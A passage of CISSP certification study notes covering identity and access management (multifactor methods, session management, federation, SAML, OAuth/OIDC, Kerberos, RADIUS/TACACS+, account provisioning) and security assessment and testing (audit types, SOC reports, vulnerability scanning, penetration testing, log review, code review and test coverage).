note: requiring users to enter a password and a PIN is NOT multifactor (both are something you
know)
Two-factor methods:
Hash Message Authentication Code (HMAC): includes a hash function used by the HMAC-based
One-Time Password (HOTP) standard to create onetime passwords
Time-based One-Time Password (TOTP): similar to HOTP, but uses a timestamp and remains
valid for a certain time frame (e.g. 30 or 60 seconds)
e.g. phone-based authenticator app, where your phone is mimicking a hardware TOTP token
(combined with userid/password is considered two-factor or two-step authentication)
Email challenge: popular method, used by websites, sending the user an email with a PIN
Short Message Service (SMS): to send users a text with a PIN is another 2-factor method; note that
NIST SP 800-63B points out vulnerabilities, and deprecates use of SMS as a two-factor method for
federal agencies
Password-less authentication: a method of verifying a user's identity without requiring them to enter a
password; uses alternate verification forms like biometrics, security tokens, or mobile device
103 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
this is an important topic, because password use (and misuse) provide many security headaches
and problems
Advantages of password-less auth include:
increased security
improved user convenience
reduction risk of phishing: if attacker gains access to a password, but password-less auth
makes it much more difficult for the attacker to access the associated device (say if
password-less auth is via mobile device)
Disadvantages of password-less auth:
dependency on devices (e.g. if via mobile phone, that device is required for access)
biometric issues associated with reliability and privacy
implementation costs associated with additional hardware devices etc
5.2.3 Session management
Session management: the management of sessions created by successful user identification,
authentication, and authorization process; session management help prevent unauthorized access by
closing unattended sessions; developers commonly use web frameworks to implement session
management, allowing devs to ensure sessions are closed after they become inactive for a period of time
Session management is important to use with any type of authentication system to prevent unauthorized
access
Session termination strategies:
schedule limitations: setting hours when a system is available
login limitation: preventing simultaneous logins using the same userID
time-outs: session expires after a set amount of inactivity
screensavers: activated after a period of inactivity, requiring re-authentication
Session termination and re-authentication helps to prevent or mitigate session hijacking
The Open Web Application Security Project (OWASP) publishes “cheat sheets” that provide app
developerʼs specific recommendations
5.2.4 Registration, proofing, and establishment of identity
Within an organization, new employees prove their identity with appropriate documentation during the
hiring process
in-person identity proofing includes things like passport, DL, birth cert etc
Online orgs often use knowledge-based authentication (KBA) for identity-proofing of someone new
(e.g. a new customer creating a new bank/savings account)
example questions include past vehicle purchases, amount of mortgage payment, previous
addresses, DL numbers
they then query authoritative information (e.g. credit bureaus or gov agencies) for matches
Cognitive Passwords: security questions that are gathered during account creation, which are later used
as questions for authentication (e.g. name of pet, color of first car etc)
one of the flaws associated with cognitive passwords is that the information is often available on
social media sites or general internet searches
5.2.5 Federated Identity Management (FIM)
Federated Identity Management (FIM) systems (a form of SSO) are often used by cloud-based apps
A federated identity links a userʼs identity in one system with multiple identity management systems
FIM allows multiple orgs to join a federation or group, agreeing to share identity information
users in each org can log in once in their own org, and their credentials are matched with a
federated identity
users can then use this federated identity to access resources in any other org within the group
104 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Access policy enforcement: enforcing access control policies within an org to regulate and manage
access
Policy Decision Point (PDP): the system responsible for making access control decisions based on
predefined access policies and rules; a PDP evaluates access requests
Policy Enforcement Point (PEP): responsible for enforcing the access control decisions made by the PDP;
the PEP acts as a gatekeeper
5.5 Manage the identity and access provisioning lifecycle (OSG-10 Chpts 13,14)
5.5.1 Account access review (e.g., user, system, service)
Administrators need to periodically review user, system and service accounts to ensure they meet
security policies and that they donʼt have excessive privileges
Be careful in using the local system account as an application service account; although it allows the app
to run without creating a special service account, it usually grants the app more access than it needs
You can use scripts to run periodically and check for unused accounts, and check privileged group
membership, removing unauthorized accounts
Guard against two access control issues:
excessive privilege: occurs when users have more privileges than assigned work tasks dictate;
these privileges should be revoked
creeping privileges (AKA privilege creep): user accounts accumulating additional privileges over
time as job roles and assigned tasks change
5.5.2 Provisioning and deprovisioning (e.g., on/off boarding and transfers)
Identity and access provisioning lifecycle refers to the creation, management, and deletion of accounts
this lifecycle is important because without properly defined and maintained user accounts, a
system is unable to establish accurate identity, perform authentication, provide authorization, and
track accountability
Provisioning/Onboarding
provisioning ensures that accounts have appropriate privileges based on task requirements and
employees receive needed hardware; said another way, includes the creation, maintenance, and
removal of user objects from apps, systems, and directories
proper user account creation, or provisioning, ensures that personnel follow specific procedures
when creating accounts
new-user account creation is AKA enrollment or registration
automated provisioning: information is provided to an app, that then creates the accounts via
pre-defined rules (assigning to appropriate groups based on roles)
automated provisioning systems create accounts consistently
workflow provisioning: provisioning that occurs through an established workflow, like an HR
process
provisioning also includes issuing hardware, tokens, smartcards etc to employees
itʼs important to keep accurate records when issuing hardware to employees
after provisioning, an org can follow up with onboarding processes, including:
the employee reads and signs the acceptable use policy (AUP)
explaining security best practices (like infected emails)
reviewing the mobile device policy
ensuring the employeeʼs computer is operational, and they can log in
configure a password manager
explaining how to access help desk
show how to access, share and save resources
Deprovisioning/Offboarding
108 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
deprovisioning processes disable or delete an account when employees leave, and offboarding
processes ensure that employees return all hardware the org issued them
deprovisioning/offboarding occurs when an employee leaves the organization or is transferred to a
different department
account revocation: deleting an account is the easiest way to deprovision
an employee's account is usually first disabled
supervisors can then review the userʼs data and determine if anything is needed
note: if terminated employee retains access to a user account after the exit interview, the risk
for sabotage is very high
deprovisioning includes collecting any hardware issued to an employee such as laptops, mobile
devices and auth tokens
5.5.3 Role definition and transition (e.g., people assigned to new roles)
When a new job role is created, it's important to identify privileges needed by someone in that role; this
ensures that employees in the new roles do not have excessive privileges
Employee responsibilities can change in the form of transfers to a different role, or into a newly created
role
for new roles, itʼs important to define the role and the privileges needed by the employees in that
role
Roles and associated groups need to be defined in terms of privileges
5.5.4 Privilege escalation (e.g., use of sudo, auditing its use)
Privilege escalation: refers to any situation that gives users more privileges than they should have
Attackers use privilege escalation techniques to gain elevated privileges, after exploiting a single system;
typically, they try to gain additional privileges on the exploited systems first
Horizontal privilege escalation: gives an attacker similar privileges as the first compromised user, but
from other accounts
Vertical privilege escalation: provides an attacker with significantly greater privileges
e.g. after compromising a regular userʼs account an attacker can use vertical privilege escalation
techniques to gain administrator privileges on the userʼs computer
the attacker can then use horizontal privilege escalation techniques to access other computers in
the network
this horizontal privilege escalation throughout the network is AKA lateral movement
Limiting privileges given to service accounts reduces the success of some privilege escalation attacks;
this should include minimizing the use of the sudo account
5.5.5 Service accounts management
Service accounts: used by applications, services, systems to interact with other resources, services, or
databases without human intervention
regardless of the fact that these accounts are not primarily used by humans for authentication,
doesn't mean they can be ignored; these accounts and the security of these accounts need to
reviewed and managed
Service account management: the process of creating, configuring, monitoring, and maintaining service
accounts
ensuring service accounts are secured, reducing the risk of unauthorized access or misuse
5.6 Implement authentication systems (OSG-10 Chpt 14)
Federated Identity Management (FIM): (AKA federated access) one-time authentication to gain access to
multiple systems, including those associated with other organizations; FIM systems link user identities in one
109 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
system with other systems to implement SSO; FIM systems are implemented on-premise (providing the most
control), via third-party cloud services, or as hybrid systems; using your Microsoft account to authenticate to a
third-party SaaS is an example of FIM
FIM trust relationships include: principal/user, identity provider (entity that owns the identity and performs
the auth), and relying party (AKA service provider)
FIM protocols include SAML, WS-Federation, OpenID (authentication), and OAuth (authorization)
Compare FIM with SSO: user authenticates one time using SSO to access multiple systems in one org; a
user authenticates one time using FIM to access multiple systems inside and outside an org because of
multiple-entity trust relationships
XML is defined in Domain 8, but essentially Extensible Markup Language is a set of HTML extensions providing
for data storage and transport in networked environments; frequently used to integrate web pages with
databases; XML is often embedded in the HTML files making up elements of a web page
XML does more than describing how to display data, it describes the data itself using tags
Security Assertion Markup Language (SAML)
Security Assertion Markup Language (SAML): an open XML-based standard commonly used to
exchange authentication and authorization (AA) information between federated orgs
Frequently used to integrate cloud services and provides the ability to make authentication and
authorization assertions
SAML provides SSO capabilities for browser access
Organization for the Advancement of Structure Information Standards (OASIS) maintains it
SAML 2.0 is an open XML-based standard
SAML 2.0 spec utilizes three entities:
Principal or User Agent: the principle is the user attempting to use the service
Service Provider (SP) (or relying party): providing a service for the user
Identity Provider (IdP): a third-party that holds the user authentication and authorization info
IdP can send three types of XML messages known as assertions:
Authentication Assertion: provides proof that the user agent provided the proper credentials,
identifies the identification method, and identifies the time the user agent logged on
Authorization Assertion: indicates whether the user agent is authorized to access the requested
service; if denied, includes why
Attribute Assertion: attributes can be any information about the user agent
OpenID Connect (OIDC) / Open Authorization (Oauth)
OpenID provides authentication
OpenID Connect (OIDC): an authentication layer using the OAuth 2.0 authorization framework,
maintained by the OpenID Foundation (not IETF); OIDC provides both authentication and authorization
(by using the OAuth framework)
OIDC is a RESTful, JSON (JavaScript Object Notation)-based auth protocol that, when paired with
OAuth can provide identity verification and basic profile info; uses JSON Web Tokens (JWT), (AKA
ID token)
OAuth and OIDC are used with many web-based applications to share information without sharing
credentials
OAuth provides authorization
OIDC uses the OAuth framework for authorization and builds on the OpenID technologies for
authentication
OAuth 2.0: an open authorization framework described in RFC 6749 (maintained by Internet Engineering
Task Force (IETF))
OAuth exchanges data via APIs
OAuth is the most widely used open standard for authorization and delegation of rights for cloud
services
The most common protocol built on OAuth is OpenID Connect (OIDC); OpenID is used for
authentication
110 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
OAuth 2.0 enables third-party apps to obtain limited access to an HTTP service, either on behalf of
a resource owner (by orchestrating an approval interaction), or by allowing third-party applications
to obtain access on its own behalf; OAuth provides the ability to access resources from another
service
OAuth 2.0 is often used for delegated access to applications, e.g. a mobile game that automatically
finds your new friends from a social media app is likely using OAuth 2.0
Conversely, if you sign into a new mobile game using a social media account (instead of creating a user
account just for the game), that process might use OIDC
Kerberos
Kerberos is the most common SSO method used within orgs
The primary purpose of Kerberos is authentication
Kerberos uses symmetric cryptography and tickets to prove identification and provide
authentication
Kerberos relies on NTP (Network Time Protocol) to sync time between server and clients
Kerberos uses port 88 for auth communications, clients communicate with KDC servers over the port
so that users can effectively access privileged network resources
Kerberos is a network authentication protocol widely used in corporate and private networks and found in
many LDAP and directory services solutions such as Microsoft Active Directory
It provides single sign-on and uses cryptography to strengthen the authentication process and protect
logon credentials
Ticket authentication is a mechanism that employs a third-party entity to prove identification and provide
authentication - Kerberos is a well-known ticket system
After users authenticate and prove their identity, Kerberos uses their proven identity to issue tickets, and
user accounts present these tickets when accessing resources
Kerberos version 5 relies on symmetric-key cryptography (AKA secret-key cryptography) using the
Advanced Encryption Standard (AES) symmetric encryption protocol
Kerberos provides confidentiality and integrity for authentication traffic using end-to-end security and
helps protect against eavesdropping and replay attacks
Kerberos uses UDP port 88 by default
Kerberos elements:
Key Distribution Center (KDC): the trusted third party that provides authentication services
Kerberos Authentication Server: hosts the functions of the KDC:
ticket-granting service (TGS): provides proof that a subject has authenticated through a
KDC and is authorized to request tickets to access other objects
the ticket for the full ticket-granting service is called a ticket-granting ticket (TGT);
when the client asks the KDC for a ticket to a server, it presents credentials in the form
of an authenticator message and a ticket (a TGT) and the ticket-granting service
opens the TGT with its master key, extracts the logon session key for this client, and
uses the logon session key to encrypt the client's copy of a session key for the server
a TGT is encrypted and includes a symmetric key, an expiration time, and userʼs IP
address
subjects present the TGT when requesting tickets to access objects
authentication service (AS): verifies or rejects the authenticity and timeliness of tickets;
often referred to as the KDC
Ticket (AKA service ticket (ST)): an encrypted message that provides proof that a subject is
authorized to access an object
Kerberos Principal: typically a user but can be any entity that can request a ticket
Kerberos realm: a logical area (such as a domain or network) ruled by Kerberos
Kerberos login process:
. user provides authentication credentials (types a username/password into the client)
. client/TGS key generated
111 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
client encrypts the username with AES for transmission to the KDC
the KDC verifies the username against a db of known credentials
the KDC generates a symmetric key that will be used by the client and the Kerberos server
it encrypts this with a hash of the userʼs password
. TGT generated - the KDC generates an encrypted timestamped TGT
. client/server ticket generated
the KDC then transmits the encrypted symmetric key and the encrypted timestamped TGT to
the client
the client installs the TGT for use until it expires
the client also decrypts the symmetric key using a hash of the userʼs password
NOTE: the clientʼs password is never transmitted over the network, but it is verified
the server encrypts a symmetric key using a hash of the userʼs password, and it can
only be decrypted with a hash of the userʼs password
. user accesses requested service
When a client wants to access an object (like a hosted resource), it must request a ticket through the
Kerberos server, in the following steps:
the client sends its TGT back to the KDC with a request for access to the resource
the KDC verifies that the TGT is valid, and checks its access control matrix to verify user privileges
for the requested resource
the KDC generates a service ticket and sends it to the client
the client sends the ticket to the server or service hosting the resource
the server or service hosting the resource verifies the validity of the ticket with the KDC
once identity and authorization are verified, Kerberos activity is complete
the server or service host then opens a session with the client and begins communication or
data transmission
Remote Authentication Dial-in User Service (RADIUS) / Terminal Access Controller Access Control System Plus
(TACACS+)
Several protocols provide centralized authentication, authorization, and accounting services; network (or
remote) access systems use AAA protocols
Remote Authentication Dial-in User Service (RADIUS): centralizes authentication for remote access
connections, such as VPNs or dial-up access
a user can connect to any network access server, which then passes on the userʼs credentials to
the RADIUS server to verify authentication and authorization and to track accounting
in this context, the network access server is the RADIUS client, and a RADIUS server acts as an
authentication server
the RADIUS server also provides AAA services for multiple remote access servers
RADIUS uses the User Datagram Protocol (UDP) by default and encrypts only the passwordʼs
exchange
RADIUS using Transport Layer Security (TLS) over TCP (port 2083) is defined by RFC 6614
RADIUS uses UDP port 1812 for RADIUS messages and UDP port 1813 for RADIUS Accounting
messages
RADIUS encrypts only the passwordʼs exchange by default
it is possible to use RADIUS/TLS to encrypt the entire session
Cisco developed Terminal Access Control Access Control System Plus (TACACS+) and released it as
an open standard
provides improvements over the earlier version and over RADIUS, it separates authentication,
authorization, and accounting into separate processes, which can be hosted on three different
servers
additionally, TACACS+ encrypts all of the authentication information, not just the password, as
RADIUS does
TACACS+ uses TCP port 49, providing a higher level of reliability for the packet transmissions
112 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Diameter AAA protocol: an advanced system designed to address the limitations of the older RADIUS
protocol (diameter is twice the radius!); Diameter improves on RADIUS by providing enhanced security
(uses IPsec or TLS instead of MD5 hashing), supports more extensive attribute sets (suitable for large,
complex networks), and can handle complex sessions
Diameter is based on RADIUS and improves many of its weaknesses, but Diameter is not
compatible with RADIUS
Domain-6 Security Assessment and Testing
Security assessment and testing programs are an important mechanism for validating the on-going effectiveness of
security controls; this domain accounts for ~12% of the exam
Security assessment and testing include a variety of tools, such as vulnerability assessments, penetration tests,
software testing, audits, and other control validation; every org should have a security assessment and testing
program defined and operational
Security assessments: comprehensive reviews of the security of a system, application, or other tested
environment
during a security assessment, a trained information security professional performs a risk assessment that
identifies vulnerabilities in the tested environment that may allow a compromise and makes
recommendations for remediation, as needed
a security assessment includes the use of security testing tools, but goes beyond scanning and manual
penetration tests
the main work product of a security assessment is normally an assessment report addressed to
management that contains the results of the assessment in nontechnical language and concludes with
specific recommendations for improving the security of the tested environment
An organizationʼs audit strategy will depend on its size, industry, financial status and other factors
a small non-profit, a small private company and a small public company will have different requirements
and goals for their audit strategies
the audit strategy should be assessed and tested regularly to ensure that the organization is not doing a
disservice to itself with the current strategy
there are three types of audit strategies: internal, external, and third-party
Software testing verifies that code functions as designed and doesn't contain security flaws
Security management needs to perform a variety of activities to properly oversee the information security
program
Log reviews, especially for admin activities, ensure that systems are not misused
Account management reviews ensure that only authorized users have access to information and systems
Backup verification ensures that the org's data protection process is working properly
Key performance and risk indicators provide a high-level view of security program effectiveness
Artifact: piece of evidence such as text, or a reference to a resource which is submitted in response to a
question
Assessment: testing or evaluation of controls to understand which are implemented correctly, operating as
intended and producing the desired outcome in meeting the security or privacy requirements of a system or org
Audit: process of reviewing a system for compliance against a standard or baseline (e.g. audit of security
controls, baselines, financial records) can be formal and independent, or informal/internal
113 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Chaos Engineering: discipline of experiments on a software system in production to build confidence in the
system's capabilities to withstand turbulent/unexpected conditions
Code testing suite: usually used to validate function, statement, branch and condition coverage
Compliance Calendar: tracks an org's audits, assessments, required filings, due dates and related
Compliance Tests: an evaluation that determines if an org's controls are being applied according to
management policies and procedures
Examination: process of reviewing/inspecting/observing/studying/analyzing specs/mechanisms/activities to
understand, clarify, or obtain evidence
**FedRAMP: (see Domain 1) a government-wide program that standardizes the security assessment,
authorization, and monitoring of cloud services and products; the program was established in 2011 to help the
federal government use cloud technologies while protecting federal information
Findings: results created by the application of an assessment procedure
Functional order of controls: deter, deny, detect, delay, determine, and decide
Fuzzing: uses modified inputs to test software performance under unexpected circumstances
Mutation (dumb) fuzzing modifies known inputs to generate synthetic inputs that may trigger unexpected
behavior
Generational (intelligent) fuzzing develops inputs based on models of expected inputs to perform the
same task
IAM system: identity and access management system combines lifecycle management and monitoring tools to
ensure that identity and authorization are properly handled throughout an org
ITSM: IT Service Management tools include change management and associated approval tracking
Judgement Sampling: AKA purposive or authoritative sampling, a non-probability sampling technique where
members are chosen only on the basis of the researcher's knowledge and judgement
Misuse Case Testing: testing strategy from a hostile actor's point of view, attempting to lead to integrity
failures, malfunctions, or other security or safety compromises
Mutation testing: mutation testing modifies a program in small ways and then tests that mutant to determine if
it behaves as it should or if it fails; technique is used to design and test software through mutation
Penetration Testing/Ethical Penetration Testing: security testing and assessment where testers actively
attempt to circumvent/default a system's security features; typically constrained by contracts to stay within
specified Rules of Engagement (RoE)
Plan of Action and Milestones (POA&M): a document identifying tasks to be accomplished, including details,
resources, milestones, and completion target dates
RUM: real user monitoring is a passive monitoring technique that records user iteration with an app or system to
ensure performance and proper app behavior; often used as a pre-deployment process using the actual user
interface
RoE: Rules of Engagement, set of rules/constraints/boundaries that establish limits of participant activity; in
ethical pen testing, an RoE defines the scope of testing, and to establish liability limits for both testers and the
sponsoring org or system owners
SCF: Script Check Engine is designed to make scripts interoperable with security policy definitions
114 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Statistical Sampling: process of selecting subsets of examples from a population with the objective of
estimating properties of the total population
Substantive Test: testing technique used by an auditor to obtain the audit evidence in order to support the
auditor's opinion
Testing: process of exercising one or more assessment objects (activities or mechanisms) under specified
conditions to compare actual to expected behavior
Trust Services Criteria (TSC): used by an auditor when evaluating the suitability of the design and operating
effectiveness of controls relevant to the security, availability, or processing integrity of information and systems
or the confidentiality or privacy of the info processed by the entity
6.1 Design and validate assessment, test, and audit strategies (OSG-10 Chpt 15)
Security audits occur when a third-party performs an assessment of the security controls protecting an org's
information assets
6.1.1 Internal (e.g., within organization control)
An organizationʼs security staff can perform security tests and assessments, and the results are meant for
internal use only, designed to evaluate controls with an eye toward finding potential improvements
An internal audit strategy should be aligned to the organizationʼs business and day-to-day operations
e.g. a publicly traded company will have a more rigorous internal auditing strategy than a privately
held company
Designing the audit strategy should include laying out applicable regulatory requirements and compliance
goals
Internal audits are performed by an organizationʼs internal audit staff and are typically intended for
internal audiences, and management use
6.1.2 External (e.g., outside organization control)
An external audit strategy should complement the internal strategy, providing regular checks to ensure
that procedures are being followed and the organization is meeting its compliance goals
External audits are performed by an outside auditing firm
these audits have a high degree of external validity because the auditors performing the
assessment theoretically have no conflict of interest with the org itself
audits by these firms are generally considered acceptable by most investors and governing bodies
third-party audit reporting is generally intended for the org's governing body
6.1.3 Third-party (e.g., outside of enterprise control)
Third-party audits are conducted by, or on behalf of, another org
In the case of a third-party audit, the org initiating the audit generally selects the auditors and designs the
scope of the audit
The statement on Standards for Attestation Engagements document 18 (SSAE 18), titled Reporting
on Controls, provides a common standard to be used by auditors performing assessments of service orgs
with the intent of allowing the org to conduct external assessments, instead of multiple third-party
assessments, and then sharing the resulting report with customers and potential customers
outside of the US, similar engagements are conducted under the International Standard for
Attestation Engagements (ISAE) 3402, Assurance Reports on Controls at a Service Organization
SSAE 18 and ISAE 3402 engagements are commonly referred to as a service organization controls (SOC)
audits
Three forms of SOC audits:
115 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
SOC 1 Engagements: assess the organizationʼs controls that might impact the accuracy of
financial reporting
SOC 2 Engagements: assess the organizationʼs controls that affect the security and privacy of
information stored in a system
SOC 2 focus on 5 trust principles: Security, Availability, Confidentiality, Processing Integrity,
and Privacy
SOC 2 audit results are confidential and are usually only shared outside an org under an NDA
SOC 3 Engagements: assess the organizationʼs controls that affect the security (confidentiality,
integrity, and availability) and privacy information stored in a system
however, SOC3 audit results are intended for public disclosure; they are regarded primarily
as marketing tools
Two types of SOC reports:
Type I Reports: provide the auditorʼs opinion on the description provided by management and the
suitability of the design of the controls
type I reports cover only a specific point in time, rather than an extended period
think of Type I report as more of a documentation review
Type II Reports: go further and also provide the auditorʼs opinion on the operating effectiveness of
the controls
the auditor actually confirms the controls are functioning properly
Type II reports also cover an extended period of time, at least 6 months, typically a year
think of Type II report as similar to a traditional audit; the auditor is checking the paperwork,
and verifying the controls are functioning properly
Type II reports are considered much more reliable than Type I reports (Type I reports simply take
the service orgs word that the controls are implemented as described); security pros want SOC2,
Type II reports
6.1.4 Location (e.g., on-premise, cloud, hybrid)
On-premise assessment: focuses on evaluating the security measures and infrastructure of in-house
systems, or within an organization's physical data centers and facilities
Cloud assessment: focus is on assessing the security of data and applications hosted in cloud service
providers environment
Hybrid assessment: assess connectivity and security measures used between on-premise and cloud
resources; this assessment looks at data flow or interconnection and integration security controls
6.2 Conduct security controls testing (OSG-10 Chpt 15)
Security control testing can include testing of the physical facility, logical systems and applications; common
testing methods include the following
6.2.1 Vulnerability assessment
Vulnerabilities: weaknesses in systems and security controls that might be exploited by a threat
Vulnerability assessments: examining systems for these weaknesses; steps in the assessment:
Reconnaissance: passively gather publicly available info
Enumeration: actively enumerate through target IP addresses and ports
Vulnerability Analysis: Identify potential vulns to be exploited
Execution: applies only if you are doing a penetration test
Document Findings: reporting on findings and severity
The goal of a vulnerability assessment is to identify elements in an environment that are not adequately
protected -- and not necessarily from a technical perspective; you can also assess the vulnerability of
physical security or the external reliance on power, for instance
116 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
can include personnel testing, physical testing, system and network testing, and other facilities
tests
Vulnerability assessments are some of the most important testing tools in the information security
professionalʼs toolkit
Security Content Automation Protocol (SCAP): provides a common framework and suite of
specifications that standardize how software flaws and security configuration is communicated both to
machines and humans; provides discussion and facilitation of automation of interactions between
different security systems (see NIST 800-126)
SCAP components related to vulnerability assessments:
Common Vulnerabilities and Exposures (CVE): provides a naming system for describing
security vulnerabilities
Common Vulnerability Scoring Systems (CVSS): provides a standardized scoring system
for describing the severity of security vulnerabilities; it includes metrics and calc tools for
exploitability, impact, how mature exploit code is, and how vulnerabilities can be remediated,
and a means to score vulns against users' unique requirements
Common Configuration Enumeration (CCE): provides a naming system for system config
issues
Common Platform Enumeration (CPE): provides a naming system for operating systems,
applications, and devices
eXtensible Configuration Checklist Description Format (XCCDF): provides a language for
specifying security checklists
Open Vulnerability and Assessment Language (OVAL): provides a language for describing
security testing procedures; used to describe the security condition of a system
Vulnerability scans automatically probe systems, applications, and networks looking for weaknesses that
could be exploited by an attacker
flaws may include missing patches, misconfigurations, or faulty code
Four main categories of vulnerability scans:
network discovery scans
network vulnerability scans
web application vulnerability scans
database vulnerability scans
Authenticated scans: (AKA credentialed security scan) involves conducting vulnerability assessments
and security checks on a network, system, or application using valid credentials; this approach enables
the scanner to simulate the actions of an authenticated user, allowing it to access deeper layers of the
target system, gather more information, and provide a more accurate assessment of vulnerabilities; often
uses a read-only account to access configuration files
6.2.2 Penetration testing (e.g., red, blue, and/or purple team exercises)
Penetration tests go beyond vulnerability testing techniques because they attempt to exploit systems
Vulnerability management: the cyclical process of identifying, classifying, prioritizing, and mitigating
vulnerabilities; programs take the results of the tests as inputs and then implement a risk management
process for identified vulnerabilities, with the following steps:
Asset inventory
Identifying the value of each asset
Identifying the vulnerabilities for each asset
Ongoing review and assessment
Testing stages from the OSG include:
Reconnaissance: passively gather publicly available info
Enumeration: active network discovery (i.e. find target IP address and ports)
Vulnerability analysis: identify potential vulns
117 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
digital forensics
security operations
Purple: not a separate team, but purple represents the collaboration between the red and
blue teams:
red and blue teams working together
providing information sharing and healthy competition
6.2.3 Log reviews
Security Information and Event Management (SIEM): packages that collect information using the
syslog functionality present in many devices, operating systems, and applications
SIEM capabilities: aggregation, normalization, correlation, secure storage, analysis, reporting
Log data is recorded in databases; common logs include:
security, application, firewall, proxy, and change management logs
Log files should be protected by centrally storing them and using permissions to restrict access, and
archived logs should be set to read-only to prevent modification
Admins may choose to deploy logging policies through Windows Group Policy Objects (GPOs)
Logging systems should also make use of the Network Time Protocol (NTP) to ensure that clocks are
synchronized on systems sending log entries to the SIEM as well as the SIEM itself, ensuring info from
multiple sources have a consistent timeline
Information security managers should also periodically conduct log reviews, particularly for sensitive
functions, to ensure that privileged users are not abusing their privileges
Network flow (NetFlow) logs are particularly useful when investigating security incidents
6.2.4 Synthetic transactions/benchmarks
Synthetic transactions: scripted transactions with known expected results
Synthetic monitoring: uses emulated or recorded transactions to monitor for performance changes in
response time, functionality, or other performance monitors
Dynamic testing may include the use of synthetic transactions to verify system performance; synthetic
transactions are run against code and compare out to expected state
6.2.5 Code review and testing
Code review and testing is "one of the most critical components of a software testing program"
These procedures provide third-party reviews of the work performed by developers before moving code
into a production environment, possibly discovering security, performance, or reliability flaws in apps
before they go live and negatively impact business operations
In code review, AKA peer review, developers other than the one who wrote the code review it for defects;
code review can be a formal or informal validation process
Fagan inspections: the most formal code review process follows six steps:
. planning
. overview
. preparation
. inspection
. rework
. follow-up
Entry criteria are the criteria or requirements which must be met to enter a specific process
Exit criteria are the criteria or requirements which must be met to complete a specific process
Static application security testing (SAST): evaluates the security of software without running it by
analyzing either the source code or the compiled application; code reviews are an example of static app
security testing
119 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Dynamic application security testing (DAST): evaluates the security of software in a runtime
environment and is often the only option for organizations deploying applications written by someone else
6.2.6 Misuse case testing
Misuse case testing: AKA abuse case testing - used by software testers to evaluate the vulnerability of
their software to known risks; focuses on behaviors that are not what the org desires or that are counter
to the proper function of a system/app
In misuse case testing, testers first enumerate the known misuse cases, then attempt to exploit those use
cases with manual or automated attack techniques
6.2.7 Coverage analysis
A test coverage analysis is used to estimate the degree of testing conducted against new software; to
provide insight into how well testing covered the use cases that an app is being tested for
Test coverage: number of use cases tested / total number of use cases
requires enumerating possible use cases (which is a difficult task), and anyone using test coverage
calcs to understand the process used to develop the input values
Five common criteria used for test coverage analysis:
branch coverage: has every IF statement been executed under all IF and ELSE conditions?
condition coverage: has every logical test in the code been executed under all sets of inputs?
functional coverage: has every function in the code been called and returned results?
loop coverage: has every loop in the code been executed under conditions that cause code
execution multiple times, only once, and not at all?
statement coverage: has every line of code been executed during the test?
Test coverage report: measures how many of the test cases have been completed; is used to provide
test metrics when using test cases
6.2.8 Interface testing (e.g., user interface, network interface, application programming interface (API))
Interface testing assesses the performance of modules against the interface specs to ensure that they
will work together properly when all the development efforts are complete
Interface testing essentially assesses the interaction between components and users with API testing,
user interface testing, and physical interface testing
Three types of interfaces should be tested:
application programming interfaces (APIs): offer a standardized way for code modules to
interact and may be exposed to the outside world through web services
should test APIs to ensure they enforce all security requirements
user interfaces (UIs): examples include graphical user interfaces (GUIs) and command-line
interfaces
UIs provide end users with the ability to interact with the software, and tests should
include reviews of all UIs
physical interfaces: exist in some apps that manipulate machinery, logic controllers, or other
objects
software testers should pay careful attention to physical interfaces because of the
potential consequences if they fail
Also see OWASP API security top 10
6.2.9 Breach attack simulations
Breach and attack simulation (BAS): platforms that seek to automate some aspects of penetration
testing
The BAS platform is not actually waging attacks, but conducting automated testing of security controls to
identify deficiencies
120 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
A BAS system combines red team (attack) and blue team (defense) techniques together with automation
to simulate advanced persistent threats (and other advanced threat actors) running against the
environment
Designed to inject threat indicators onto systems and networks in an effort to trigger other security
controls (e.g. place a suspicious file on a server)
detection and prevention controls should immediately detect and/or block this traffic as potentially
malicious
See:
OWASP Web Security Testing Guide
OSSTMM (Open Source Security Testing Methodology Manual)
NIST 800-115
FedRAMP Penetration Test Guidance
PCI DSS Information Supplemental on Penetration Testing
6.2.10 Compliance checks
Orgs should create and maintain compliance plans documenting each of their regulatory obligations and
map those to the specific security controls designed to satisfy each objective
Compliance checks are an important part of security testing and assessment programs for regulated
firms: these checks verify that all of the controls listed in a compliance plan are functioning properly and
are effectively meeting regulatory requirements
6.3 Collect security process data (e.g. technical and administrative) (OSG-10 Chpts
15,18)
Many components of the information security program generate data that is crucial to security assessment
processes; these components include:
Account management process
Management review and approval
Key performance and risk indicators
Backup verification data
Data generated by disaster recovery and business continuity programs
6.3.1 Account management
Preferred attacker techniques for obtaining privilege user access include:
compromising an existing privileged account: mitigated through use of strong authentication
(strong passwords and multifactor), and by admins use of privileged accounts only for specific
tasks
privilege escalation of a regular account or creation of a new account: these approaches can be
mitigated by paying attention to the creation, modification, and use of user accounts
6.3.2 Management review and approval
Account management reviews ensure that users only retain authorized permissions and that unauthorized
modifications do not occur
Full review of accounts: time-consuming to review all, and often done only for highly privileged accounts
Organizations that donʼt have time to conduct a full review process may use sampling, but only if
sampling is truly random
Adding accounts: should be a well-defined process, and users should sign an AUP
Adding, removing, and modifying accounts and permissions should be carefully controlled and
documented
Accounts that are no longer needed should be suspended
121 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
and with internal and external entities, assessment of response efforts, and restoration of services
DR programs should also include training and awareness efforts to ensure personnel understand
their responsibilities and lessons learned sessions to continuously improve the program
These processes need to be periodically accessed, and regular testing of disaster recovery and business
continuity controls provide organizations with the assurance they are effectively protected against
disruptions to business ops
Protection of life is of the utmost importance and should be dealt with first before attempting to save
material things
6.4 Analyze test output and generate report (OSG-10 Chpt 15)
Step 1: review and understand the data
The goal of the analysis process is to proceed logically from facts to actionable info
A list of vulns and policy exceptions is of little value to business leaders unless it's used in context, so
once all results have been analyzed, you're ready to start writing the official report
Step 2: determine the business impact of those facts
Ask "so what?"
